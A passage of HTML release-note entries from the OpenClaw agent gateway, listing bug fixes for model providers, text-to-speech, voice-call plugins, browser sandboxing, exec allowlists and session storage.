<li>Providers/DeepSeek: add missing <code>reasoning_content</code> placeholders for replayed assistant tool-call turns when DeepSeek V4 thinking is enabled, so switching an existing session to <code>deepseek-v4-flash</code> or <code>deepseek-v4-pro</code> no longer trips the provider's 400 replay check. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4326839791" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71372" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71372/hovercard" href="https://github.com/openclaw/openclaw/issues/71372">#71372</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yangyang1719/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yangyang1719">@yangyang1719</a>.</li>
<li>Exec approvals: allow bare command-name allowlist patterns to match PATH-resolved executable basenames without trusting <code>./tool</code> or absolute path-selected binaries. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4326445964" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71315" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71315/hovercard" href="https://github.com/openclaw/openclaw/issues/71315">#71315</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/chen-zhang-cs-code/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/chen-zhang-cs-code">@chen-zhang-cs-code</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dengluozhang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dengluozhang">@dengluozhang</a>.</li>
<li>Config/recovery: skip whole-file last-known-good rollback when invalidity is scoped to <code>plugins.entries.*</code>, preserving unrelated user settings during plugin schema or host-version skew. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4326134469" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71289" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71289/hovercard" href="https://github.com/openclaw/openclaw/issues/71289">#71289</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jalehman/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jalehman">@jalehman</a>.</li>
<li>Agents/tools: keep resolved reply-run configs from being overwritten by stale runtime snapshots, and let empty web runtime metadata fall back to configured provider auto-detection so standard and queued turns expose the same tool set. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4326671346" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71355" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71355/hovercard" href="https://github.com/openclaw/openclaw/issues/71355">#71355</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/c-g14/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/c-g14">@c-g14</a>.</li>
<li>Agents/TTS: pass the resolved shared config into the <code>tts</code> tool, so tool-triggered speech uses configured providers and voices instead of falling back to a fresh config load.</li>
<li>Reply media: strip <code>MEDIA:</code> attachments from final replies when the same media already went out through block streaming, preventing duplicate Telegram voice notes and files. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4248934459" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65468" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65468/hovercard" href="https://github.com/openclaw/openclaw/issues/65468">#65468</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/aurora-openclaw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/aurora-openclaw">@aurora-openclaw</a>.</li>
<li>Agents/TTS: preserve voice media when a tool-generated reply is paired with an exact <code>NO_REPLY</code> sentinel, stripping the sentinel text instead of dropping the audio payload. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4256841209" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66092" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66092/hovercard" href="https://github.com/openclaw/openclaw/issues/66092">#66092</a>.</li>
<li>Compaction: honor explicit <code>agents.defaults.compaction.keepRecentTokens</code> for manual <code>/compact</code>, re-distill safeguard summaries instead of snowballing previous summaries, and enable safeguard summary quality checks by default. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4326685738" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71357" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71357/hovercard" href="https://github.com/openclaw/openclaw/issues/71357">#71357</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/WhiteGiverMa/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/WhiteGiverMa">@WhiteGiverMa</a>.</li>
<li>Sessions: honor configured <code>session.maintenance</code> settings during load-time maintenance instead of falling back to default entry caps. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4326685301" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71356" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71356/hovercard" href="https://github.com/openclaw/openclaw/issues/71356">#71356</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/comolago/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/comolago">@comolago</a>.</li>
<li>Browser/sandbox: pass the resolved <code>browser.ssrfPolicy</code> into sandbox browser bridges and refresh cached bridges when the effective policy changes, so sandboxed browser navigation honors private-network opt-ins. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4071275183" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/45153" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/45153/hovercard" href="https://github.com/openclaw/openclaw/issues/45153">#45153</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4164228294" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/57055" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/57055/hovercard" href="https://github.com/openclaw/openclaw/issues/57055">#57055</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jzakirov/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jzakirov">@jzakirov</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zuoanCo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zuoanCo">@zuoanCo</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kybrcore/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kybrcore">@kybrcore</a>.</li>
<li>Browser/proxy: keep Gateway/provider proxy environment variables from proxying the OpenClaw-managed browser, so <code>HTTP_PROXY</code> and <code>HTTPS_PROXY</code> no longer block ordinary browser navigation. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4326697742" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71358" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71358/hovercard" href="https://github.com/openclaw/openclaw/issues/71358">#71358</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Sanjays2402/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Sanjays2402">@Sanjays2402</a>.</li>
<li>Agents/MCP: validate draft-2020-12 MCP tool output schemas with a draft-aware bundle-MCP client validator, so external MCP servers no longer fail catalog/tool execution with missing schema refs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4289712603" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68772" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68772/hovercard" href="https://github.com/openclaw/openclaw/issues/68772">#68772</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4309436682" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70196" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70196/hovercard" href="https://github.com/openclaw/openclaw/issues/70196">#70196</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mwiesen/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mwiesen">@mwiesen</a>.</li>
<li>Dashboard/Windows: open Control UI and OAuth URLs through the system URL handler without <code>cmd.exe</code> parsing or PATH-based <code>rundll32</code> lookup, and reject non-HTTP browser-open inputs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4322917267" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71098" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71098/hovercard" href="https://github.com/openclaw/openclaw/issues/71098">#71098</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Sanjays2402/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Sanjays2402">@Sanjays2402</a>.</li>
<li>Config/doctor: reject legacy <code>secretref-env:&lt;ENV_VAR&gt;</code> marker strings on SecretRef credential paths and migrate valid markers to structured env SecretRefs with <code>openclaw doctor --fix</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4113222768" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51794" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/51794/hovercard" href="https://github.com/openclaw/openclaw/issues/51794">#51794</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/halointellicore/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/halointellicore">@halointellicore</a>.</li>
<li>Plugin SDK/browser: export the resolved browser tab-cleanup config type through the browser profile facade, keeping SDK subpath contracts aligned.</li>
<li>Providers/OpenAI: separate API-key and Codex sign-in onboarding groups, and avoid replaying stale OpenAI Responses reasoning blocks after a model route switch.</li>
<li>Providers/OpenAI-compatible: forward <code>prompt_cache_key</code> on Completions requests only for providers that opt in with <code>compat.supportsPromptCacheKey</code>, keeping default proxy payloads unchanged. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4294282502" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69272" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69272/hovercard" href="https://github.com/openclaw/openclaw/issues/69272">#69272</a>.</li>
<li>Providers/OpenAI-compatible: skip null or non-object streaming chunks from custom providers instead of failing the turn after partial output. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4108616277" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51112" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/51112/hovercard" href="https://github.com/openclaw/openclaw/issues/51112">#51112</a>.</li>
<li>Providers/OpenAI-compatible: treat singular MLX-style <code>finish_reason: "tool_call"</code> as tool use instead of a provider error. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4208453157" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61499" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/61499/hovercard" href="https://github.com/openclaw/openclaw/issues/61499">#61499</a>.</li>
<li>Docs/TTS: clarify that legacy flat TTS provider config blocks are repaired by <code>openclaw doctor --fix</code>, not accepted by strict runtime schema on load. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4158022690" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56220" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/56220/hovercard" href="https://github.com/openclaw/openclaw/issues/56220">#56220</a>.</li>
<li>Plugins/OpenCode: strip unsupported disabled Responses reasoning payloads for OpenCode image understanding. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4310313297" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70252" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70252/hovercard" href="https://github.com/openclaw/openclaw/issues/70252">#70252</a>.</li>
<li>Plugins/OpenCode/OpenCode Go: register image understanding metadata so the image tool is available for OpenCode catalog models with vision support. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4313555323" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70482" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70482/hovercard" href="https://github.com/openclaw/openclaw/issues/70482">#70482</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4210814709" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61789" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/61789/hovercard" href="https://github.com/openclaw/openclaw/issues/61789">#61789</a>.</li>
<li>Plugins/OpenCode Go: update the default Go catalog model to <code>opencode-go/kimi-k2.6</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/masrlinu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/masrlinu">@masrlinu</a>.</li>
<li>Providers/ElevenLabs: omit the MP3-only <code>Accept</code> header for PCM telephony synthesis, so Voice Call requests for <code>pcm_22050</code> no longer receive MP3 audio. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4270976949" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67340" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67340/hovercard" href="https://github.com/openclaw/openclaw/issues/67340">#67340</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/marcchabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/marcchabot">@marcchabot</a>.</li>
<li>Providers/MiniMax TTS: truncate fractional pitch overrides before sending T2A requests, matching MiniMax's integer pitch contract while preserving fractional speed and volume. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4214217034" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62144" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62144/hovercard" href="https://github.com/openclaw/openclaw/issues/62144">#62144</a>.</li>
<li>Providers/MiniMax TTS: transcode voice-note targets to Opus so Feishu/Telegram receive native voice messages instead of MP3 file attachments. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4229348935" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63540" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63540/hovercard" href="https://github.com/openclaw/openclaw/issues/63540">#63540</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4237017402" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64134" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64134/hovercard" href="https://github.com/openclaw/openclaw/issues/64134">#64134</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4313032398" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70445" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70445/hovercard" href="https://github.com/openclaw/openclaw/issues/70445">#70445</a>.</li>
<li>Providers/Microsoft TTS: keep allowlisted bundled speech providers discoverable even when another speech plugin has already registered, so Edge/Microsoft TTS is available alongside OpenAI. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4213989780" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62117" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62117/hovercard" href="https://github.com/openclaw/openclaw/issues/62117">#62117</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4265142491" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66850" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66850/hovercard" href="https://github.com/openclaw/openclaw/issues/66850">#66850</a>.</li>
<li>Providers/Microsoft TTS: honor legacy <code>messages.tts.providers.edge</code> voice settings after normalizing Edge TTS to the Microsoft provider. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4237212413" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64153" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64153/hovercard" href="https://github.com/openclaw/openclaw/issues/64153">#64153</a>.</li>
<li>Providers/OpenRouter: add an OpenRouter TTS provider using the OpenAI-compatible <code>/audio/speech</code> endpoint and <code>OPENROUTER_API_KEY</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4325734644" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71268" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71268/hovercard" href="https://github.com/openclaw/openclaw/issues/71268">#71268</a>.</li>
<li>macOS Talk Mode: retry failed local ElevenLabs stream playback through gateway <code>talk.speak</code> before falling back to the system voice, so configured ElevenLabs voices still play when streaming playback fails. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4250847002" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65662" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65662/hovercard" href="https://github.com/openclaw/openclaw/issues/65662">#65662</a>.</li>
<li>Plugins/Voice Call: reap stale pre-answer calls by default, honor configured TTS timeouts for Twilio media-stream playback, and fail empty telephony audio instead of completing as silence. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4051016855" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/42071" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/42071/hovercard" href="https://github.com/openclaw/openclaw/issues/42071">#42071</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4205319172" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60957" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/60957/hovercard" href="https://github.com/openclaw/openclaw/pull/60957">#60957</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Ryce/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Ryce">@Ryce</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sliekens/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sliekens">@sliekens</a>.</li>
<li>Plugins/Voice Call: fail fast when Twilio, Telnyx, or Plivo would fall back to a loopback/private webhook URL, so calls do not start with an unreachable callback endpoint. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/artemgetmann/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/artemgetmann">@artemgetmann</a>.</li>
<li>Plugins/Voice Call: resolve queued-but-not-yet-playing Twilio TTS entries when barge-in or stream teardown clears the playback queue, so callers awaiting <code>queueTts()</code> do not hang. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kevinWangSheng/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kevinWangSheng">@kevinWangSheng</a>.</li>
<li>Plugins/Voice Call: terminate expired restored call sessions with the provider and restart restored max-duration timers with only the remaining duration, preventing stale outbound retry loops after Gateway restarts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4086219038" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48739" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/48739/hovercard" href="https://github.com/openclaw/openclaw/issues/48739">#48739</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mira-solari/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mira-solari">@mira-solari</a>.</li>
<li>Plugins/Voice Call: start provider STT after Telnyx outbound conversation greetings and pass configured Telnyx voice IDs through to the speak action. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4156673333" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56091" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/56091/hovercard" href="https://github.com/openclaw/openclaw/issues/56091">#56091</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roshan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roshan">@roshan</a>.</li>
<li>Skills: honor legacy <code>metadata.clawdbot</code> requirements and installer hints when <code>metadata.openclaw</code> is absent, so older skills no longer appear ready when required binaries are missing. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4326521920" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71323" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71323/hovercard" href="https://github.com/openclaw/openclaw/issues/71323">#71323</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/chen-zhang-cs-code/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/chen-zhang-cs-code">@chen-zhang-cs-code</a>.</li>
<li>Browser/config: expand <code>~</code> in <code>browser.executablePath</code> before Chromium launch, so home-relative custom browser paths no longer fail with <code>ENOENT</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4269865123" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67264" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67264/hovercard" href="https://github.com/openclaw/openclaw/issues/67264">#67264</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Quratulain-bilal/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Quratulain-bilal">@Quratulain-bilal</a>.</li>
<li>Channels/streaming: keep Telegram tool-progress preview updates enabled by default to match released behavior, document <code>streaming.preview.toolProgress: false</code> for disabling only those status lines, and prevent preview progress text from triggering Telegram Markdown links, Discord mentions, or Slack mrkdwn mentions. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4326508873" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71320" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71320/hovercard" href="https://github.com/openclaw/openclaw/issues/71320">#71320</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/neeravmakwana/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/neeravmakwana">@neeravmakwana</a>.</li>
<li>Gateway/sessions: copy the oversized <code>sessions.json</code> to a rotation backup before the atomic rewrite instead of renaming the live store away, so a crash during rotation keeps the existing session-to-transcript mapping authoritative. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4284400069" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68229" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68229/hovercard" href="https://github.com/openclaw/openclaw/issues/68229">#68229</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jjjojoj/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jjjojoj">@jjjojoj</a>.</li>
<li>Providers/OpenAI-compatible: strip OpenAI-only Completions <code>store</code> from proxy payloads and allow <code>extra_body</code>/<code>extraBody</code> passthrough params for provider-specific request fields. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4211200866" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61826" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/61826/hovercard" href="https://github.com/openclaw/openclaw/issues/61826">#61826</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4302850717" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69717" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69717/hovercard" href="https://github.com/openclaw/openclaw/issues/69717">#69717</a>.</li>
<li>Discord/subagents: preserve thread-bound completion delivery by keeping the requester-agent announce path primary and falling back to direct thread sends only when the announce produces no visible output. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4322371947" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71064" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71064/hovercard" href="https://github.com/openclaw/openclaw/pull/71064">#71064</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DolencLuka/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DolencLuka">@DolencLuka</a>.</li>
<li>Discord/proxy: serialize proxied multipart attachment uploads with undici <code>FormData</code>, so Discord media sends work through configured REST proxies. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4326902238" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71383" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71383/hovercard" href="https://github.com/openclaw/openclaw/pull/71383">#71383</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TC500/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TC500">@TC500</a>.</li>
<li>Browser/tool: give Chrome MCP existing-session manage calls a longer default timeout, pass explicit tool timeouts through tab management, and recover stale selected-page MCP sessions instead of forcing a manual reset.</li>
<li>Browser/sandbox: clean up idle tracked tabs opened by primary-agent browser sessions, while preserving active tab reuse and lifecycle cleanup for subagents, cron, and ACP sessions. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4324158498" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71165" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71165/hovercard" href="https://github.com/openclaw/openclaw/issues/71165">#71165</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dwbutler/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dwbutler">@dwbutler</a>.</li>
<li>Plugins/Voice Call: reuse the webhook runtime across in-process plugin contexts, avoiding <code>EADDRINUSE</code> when agent tools or CLI commands run while the Gateway already owns the voice webhook port. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4175530265" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58115" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58115/hovercard" href="https://github.com/openclaw/openclaw/issues/58115">#58115</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sfbrian/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sfbrian">@sfbrian</a>.</li>
<li>Plugins/Voice Call: answer accepted Telnyx inbound Call Control legs on <code>call.initiated</code>, so webhooks that reach OpenClaw no longer leave the caller ringing until hangup. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4176978233" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58231" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58231/hovercard" href="https://github.com/openclaw/openclaw/issues/58231">#58231</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4041816992" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/40131" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/40131/hovercard" href="https://github.com/openclaw/openclaw/issues/40131">#40131</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/KonsultDigital/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/KonsultDigital">@KonsultDigital</a>.</li>
<li>Plugins/Voice Call: coalesce concurrent webhook server starts on the same runtime instance, avoiding a second <code>listen()</code> bind when overlapping startup paths race. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/education-01/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/education-01">@education-01</a>.</li>
<li>Plugins/Voice Call: pin voice response sessions to <code>responseModel</code> before embedded agent runs, avoiding live-session model switch failures when the global default model differs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4198795959" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60118" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/60118/hovercard" href="https://github.com/openclaw/openclaw/issues/60118">#60118</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xinbenlv/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xinbenlv">@xinbenlv</a>.</li>
